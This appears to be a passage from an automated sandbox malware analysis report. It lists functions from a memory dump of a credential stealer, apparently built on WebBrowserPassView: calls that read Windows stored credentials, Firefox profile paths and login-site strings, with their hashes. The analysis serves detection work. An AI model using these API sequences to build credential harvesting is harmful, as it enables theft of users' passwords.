                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 304928396-0
                                                                                                                                                                        • Opcode ID: 0e0f0537c5a9146dc27172f456af1fd8f34a183f9f4551b6ad3cfb99057e354f
                                                                                                                                                                        • Instruction ID: d1f198460081c9bd407666b3734bdbb6004887ae833e7bd4338906f330e243fe
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e0f0537c5a9146dc27172f456af1fd8f34a183f9f4551b6ad3cfb99057e354f
                                                                                                                                                                        • Instruction Fuzzy Hash: F241E975640704BFEB20AF70DC4AF9777ADFB09705F000829F399A91D1CAF5A8508B29
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00406B51 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 198registrytimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00406B72
                                                                                                                                                                          • Part of subcall function 00413E4F: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00406BE5
                                                                                                                                                                        • memset.MSVCRT ref: 00406C09
                                                                                                                                                                        • memset.MSVCRT ref: 00406C25
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 00406C45
                                                                                                                                                                        • wcsrchr.MSVCRT ref: 00406C6C
                                                                                                                                                                        • CompareFileTime.KERNEL32(?,?,00000000), ref: 00406C9F
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00406CC1
                                                                                                                                                                        • memset.MSVCRT ref: 00406BBF
                                                                                                                                                                          • Part of subcall function 00413EE6: RegEnumKeyExW.ADVAPI32 ref: 00413F09
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00411799), ref: 00406CF9
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00406D07
                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406D22
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406D62
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
                                                                                                                                                                        • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                                                                                        • API String ID: 1094916163-2797892316
                                                                                                                                                                        • Opcode ID: 07749401729549ea18023a88aae6b7e086f03ff84713cd47a7d93030012f0eb7
                                                                                                                                                                        • Instruction ID: 3a0c8bae75b73356f025c28445405007b897e2e36fb84af6dfbdfac580efd4a0
                                                                                                                                                                        • Opcode Fuzzy Hash: 07749401729549ea18023a88aae6b7e086f03ff84713cd47a7d93030012f0eb7
                                                                                                                                                                        • Instruction Fuzzy Hash: 9961BBB2D04229AAEF20EBA1CC45BDF77BCFF45344F010476E909F2181EB795A548B59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00414847 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                        • API String ID: 3143752011-1996832678
                                                                                                                                                                        • Opcode ID: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
                                                                                                                                                                        • Instruction ID: 7b6d47d0ae84673c1440bb3f6a45a38d491a9b2de853a8b7013f3412f20213e7
                                                                                                                                                                        • Opcode Fuzzy Hash: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
                                                                                                                                                                        • Instruction Fuzzy Hash: FC31B9B6504305BAF720EA55DD86EAB73BCDBC1714F20406FF214B2182EB7C99858A5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004118EA Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
                                                                                                                                                                        • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
                                                                                                                                                                        • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
                                                                                                                                                                        • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
                                                                                                                                                                        • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
                                                                                                                                                                        • GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
                                                                                                                                                                        • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
                                                                                                                                                                        • GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                        • API String ID: 667068680-2887671607
                                                                                                                                                                        • Opcode ID: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
                                                                                                                                                                        • Instruction ID: 49f1c8a85f5507baf9409120c02bba5f1b3352987f0cf3d6caa0177263683d24
                                                                                                                                                                        • Opcode Fuzzy Hash: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
                                                                                                                                                                        • Instruction Fuzzy Hash: 6C01C8F5D80314BADB216FB1AC8AA053EA5F71C7D3710883BE42452272D778C610CE9C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040D399 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                        • API String ID: 1607361635-601624466
                                                                                                                                                                        • Opcode ID: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
                                                                                                                                                                        • Instruction ID: 86ecdfe433e0374b5ced7b433421c6295f8700cac4d68a1fbb2313435c6baabf
                                                                                                                                                                        • Opcode Fuzzy Hash: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
                                                                                                                                                                        • Instruction Fuzzy Hash: 6561A171900208EFEF14EF94CC85EAE7B79EF45314F1001AAF815A72D2DB38AA55CB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040D9D6 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                        • API String ID: 2000436516-3842416460
                                                                                                                                                                        • Opcode ID: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
                                                                                                                                                                        • Instruction ID: d19b445dff31b0d86a25f5297df5c333c47444227bfe33656549cbc54b746d40
                                                                                                                                                                        • Opcode Fuzzy Hash: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D4142B1D40219AAEB20EF95CC85FFB737CFF45304F4540ABB918A2191E7389A948F65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BD50 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040BD76
                                                                                                                                                                        • memset.MSVCRT ref: 0040BD92
                                                                                                                                                                          • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
                                                                                                                                                                          • Part of subcall function 00443D20: GetFileVersionInfoSizeW.VERSION(0040BDC4,?,00000000), ref: 00443D36
                                                                                                                                                                          • Part of subcall function 00443D20: ??2@YAPAXI@Z.MSVCRT ref: 00443D51
                                                                                                                                                                          • Part of subcall function 00443D20: GetFileVersionInfoW.VERSION(0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D61
                                                                                                                                                                          • Part of subcall function 00443D20: VerQueryValueW.VERSION(00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D74
                                                                                                                                                                          • Part of subcall function 00443D20: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443DB1
                                                                                                                                                                          • Part of subcall function 00443D20: _snwprintf.MSVCRT ref: 00443DD1
                                                                                                                                                                          • Part of subcall function 00443D20: wcscpy.MSVCRT ref: 00443DFB
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040BDD6
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040BDE5
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040BDF5
                                                                                                                                                                        • EnumResourceNamesW.KERNEL32(0040BEF4,00000004,0040BB24,00000000), ref: 0040BE5A
                                                                                                                                                                        • EnumResourceNamesW.KERNEL32(0040BEF4,00000005,0040BB24,00000000), ref: 0040BE64
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040BE6C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                        • API String ID: 3037099051-517860148
                                                                                                                                                                        • Opcode ID: 2fcdf58697040aa4c7eb54e95d53208f650488f18f63fe222914c72976027cdc
                                                                                                                                                                        • Instruction ID: d02a95b1ac945ad733c6c475c60bd1556454897fd3a1253caa6bc47d13ece21f
                                                                                                                                                                        • Opcode Fuzzy Hash: 2fcdf58697040aa4c7eb54e95d53208f650488f18f63fe222914c72976027cdc
                                                                                                                                                                        • Instruction Fuzzy Hash: AD21A9B294021876EB20BB529C46FCB7B6CDF55754F00047BF50871192DBBC9A94C6EE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00403C2A Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                        • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                                                                                                                                                        • API String ID: 2238633743-1621422469
                                                                                                                                                                        • Opcode ID: 75ed6b8b2212405dc2e3096810b13c68b16b60bade9346944bfe3eeaaf52b7e4
                                                                                                                                                                        • Instruction ID: d7a6577b60cfc464e8e16958ee64dd601e1a2e2a5708563609cb1b578f097ad1
                                                                                                                                                                        • Opcode Fuzzy Hash: 75ed6b8b2212405dc2e3096810b13c68b16b60bade9346944bfe3eeaaf52b7e4
                                                                                                                                                                        • Instruction Fuzzy Hash: A2F0F974940B44AFEF306F769D49E06BEF0EFA87017214D2EE0C1A3651D7B99100CE48
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407737 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00407C89,?,?,?,0000001E), ref: 00407760
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00407774
                                                                                                                                                                          • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                        • memset.MSVCRT ref: 004077A6
                                                                                                                                                                        • memset.MSVCRT ref: 004077C8
                                                                                                                                                                        • memset.MSVCRT ref: 004077DD
                                                                                                                                                                        • strcmp.MSVCRT ref: 0040781C
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078B2
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078D1
                                                                                                                                                                        • memset.MSVCRT ref: 004078E5
                                                                                                                                                                        • strcmp.MSVCRT ref: 00407949
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040797B
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,00407C89,?,?,?,0000001E), ref: 00407984
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$File$strcmpstrcpy$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                        • String ID: ---
                                                                                                                                                                        • API String ID: 3751793120-2854292027
                                                                                                                                                                        • Opcode ID: 2a857cbeb5ab5e1bd89b1bc0351e99f96f5a4f3ec23066d0f11bd49c9005f69b
                                                                                                                                                                        • Instruction ID: 5eab4b77d8efc932d29ad1d752f1a4839dd8d7bf75d011c8978729a0abaaed7e
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a857cbeb5ab5e1bd89b1bc0351e99f96f5a4f3ec23066d0f11bd49c9005f69b
                                                                                                                                                                        • Instruction Fuzzy Hash: 856159B2C0416D9ADF20EB948C859DEBB7C9B15314F1041FBE518B3141DA385FC4CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00412F99 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(psapi.dll,?,00411582), ref: 00412FAC
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412FC5
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412FD6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00412FE7
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00412FF8
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413009
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413029
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                        • API String ID: 2449869053-70141382
                                                                                                                                                                        • Opcode ID: cfd5c71916fbce4a342b80b0f76a79ff8ef3fa3daac0bce444ef2cea232ec273
                                                                                                                                                                        • Instruction ID: 777907c91c3138f07d32b7effc6a6e277a0cb3bdfe1d402d2202e46302417196
                                                                                                                                                                        • Opcode Fuzzy Hash: cfd5c71916fbce4a342b80b0f76a79ff8ef3fa3daac0bce444ef2cea232ec273
                                                                                                                                                                        • Instruction Fuzzy Hash: B5014030940715AAD7318F256E44B6A2EE4E759B83B14002BA404D2A5AEBB8D941DBAC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040FDE0 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                        • API String ID: 2081463915-1959339147
                                                                                                                                                                        • Opcode ID: d68f99de9f7ef6dc0a98dc4c4bcb6a836855c619b54ed7beb0ba6369b4841934
                                                                                                                                                                        • Instruction ID: 6ae1867121f1a9de607d4cf96a2848453b881622ab493d5bc2878352e6736150
                                                                                                                                                                        • Opcode Fuzzy Hash: d68f99de9f7ef6dc0a98dc4c4bcb6a836855c619b54ed7beb0ba6369b4841934
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D01EC6328A32164F97469A7AC07F8B0A49CBD2F7AF71543BF904D41C6FF8D944560AC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00412F15 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00411589), ref: 00412F24
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00412F3D
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00412F4E
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00412F5F
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00412F70
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00412F81
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                        • API String ID: 667068680-3953557276
                                                                                                                                                                        • Opcode ID: 9afc599291b44c0031a1a238e792fad3046f96ec859f9be66ee04854d14c5414
                                                                                                                                                                        • Instruction ID: 90193f1111e05c4afbc6439255eabbfb584b4719c6c3eda45dffcf0f008ca331
                                                                                                                                                                        • Opcode Fuzzy Hash: 9afc599291b44c0031a1a238e792fad3046f96ec859f9be66ee04854d14c5414
                                                                                                                                                                        • Instruction Fuzzy Hash: 6BF08B30941321AEAB208F295F40F6729B4E745BCAF140037B404D1655DBE8C453DF7D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00403B29 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00403BA4: FreeLibrary.KERNEL32(?,00403B31,00000000,00409589,?,00000000,?), ref: 00403BAB
                                                                                                                                                                        • LoadLibraryW.KERNEL32(advapi32.dll,00000000,00409589,?,00000000,?), ref: 00403B36
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00403B4F
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 00403B5B
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403B67
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00403B73
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403B7F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                        • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                        • API String ID: 2449869053-4258758744
                                                                                                                                                                        • Opcode ID: b35c21cb85061f263d9bcfade7dbfc97ff2743854c4f3c632f847b452f6a88c2
                                                                                                                                                                        • Instruction ID: 8f7743962e36341c748a679f4d1b70e48ab6ec882cd35c5a4d1c5c737e04e9f5
                                                                                                                                                                        • Opcode Fuzzy Hash: b35c21cb85061f263d9bcfade7dbfc97ff2743854c4f3c632f847b452f6a88c2
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F011A34500B419BDB31AF768809E0ABBF4EF94709B20882FE091A3692D6BDB140CF48
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F99D Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 166windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040FA22
                                                                                                                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 0040FA30
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 0040FA45
                                                                                                                                                                        • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040FA79
                                                                                                                                                                        • SelectObject.GDI32(00000014,00000005), ref: 0040FA85
                                                                                                                                                                          • Part of subcall function 0040F7F1: GetCursorPos.USER32(?), ref: 0040F7FB
                                                                                                                                                                          • Part of subcall function 0040F7F1: GetSubMenu.USER32 ref: 0040F809
                                                                                                                                                                          • Part of subcall function 0040F7F1: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040F83A
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040FAA0
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 0040FAA9
                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 0040FAB0
                                                                                                                                                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040FAF4
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040FB3D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Cursor$MenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
                                                                                                                                                                        • String ID: WebBrowserPassView
                                                                                                                                                                        • API String ID: 3991541706-2171583229
                                                                                                                                                                        • Opcode ID: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
                                                                                                                                                                        • Instruction ID: d9273dffa9cc4a7b5f3d28471e210e7f23542924c6da0ead56af32090a150d55
                                                                                                                                                                        • Opcode Fuzzy Hash: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
                                                                                                                                                                        • Instruction Fuzzy Hash: 3C51F431600105ABDB34AF64C895B6A77B6BF48310F104137F909AB6E1DB78EC55CF89
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

